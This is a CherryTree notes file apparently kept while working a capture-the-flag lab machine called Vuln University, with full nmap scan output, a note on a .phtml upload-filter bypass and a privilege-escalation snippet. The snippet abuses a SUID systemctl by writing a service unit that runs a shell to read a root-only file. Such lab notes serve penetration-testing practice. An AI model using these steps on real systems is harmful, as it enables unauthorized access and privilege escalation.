<?xml version="1.0" ?>
<cherrytree>
	<node custom_icon_id="0" foreground="" is_bold="False" name="enumeration" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1611613492.32" ts_lastsave="1611618697.01" unique_id="1">
		<rich_text></rich_text>
		<node custom_icon_id="0" foreground="" is_bold="False" name="nmap-results" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1611615117.16" ts_lastsave="1611615773.22" unique_id="2">
			<rich_text>nmap -p- -sC -sV -oA nmap/vulnervisity 10.10.234.90

Starting Nmap 7.80 ( </rich_text>
			<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
			<rich_text> ) at 2021-01-26 04:14 IST
Nmap scan report for 10.10.234.90
Host is up (0.18s latency).
Not shown: 65529 closed ports

PORT     STATE SERVICE     VERSION

21/tcp   open  ftp         vsftpd 3.0.3

22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved

3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3h50m53s, deviation: 2h53m12s, median: -5h30m54s
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2021-01-25T12:26:18-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-01-25T17:26:19
|_  start_date: N/A

Service detection performed. Please report any incorrect results at </rich_text>
			<rich_text link="webs https://nmap.org/submit/">https://nmap.org/submit/</rich_text>
			<rich_text> .
Nmap done: 1 IP address (1 host up) scanned in 753.58 seconds
</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="web-app" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1611615131.09" ts_lastsave="1611618532.97" unique_id="3">
			<rich_text scale="h3" underline="single">PORT: </rich_text>
			<rich_text scale="h3" underline="single" weight="heavy">3333</rich_text>
			<rich_text>

UPLOAD PAGE -→  /internal/

using burp intruder -→ phtml extension allowed

</rich_text>
		</node>
	</node>
	<node custom_icon_id="0" foreground="" is_bold="False" name="priv-esc" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1611618697.01" ts_lastsave="1611618701.51" unique_id="4">
		<rich_text>login as www-data

searching for suid exploitation

/bin/systemctl

</rich_text>
		<rich_text family="monospace">TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c &quot;cat /root/root.txt &gt; /tmp/output&quot;
[Install]
WantedBy=multi-user.target' &gt; $TF</rich_text>
		<rich_text>



</rich_text>
	</node>
</cherrytree>
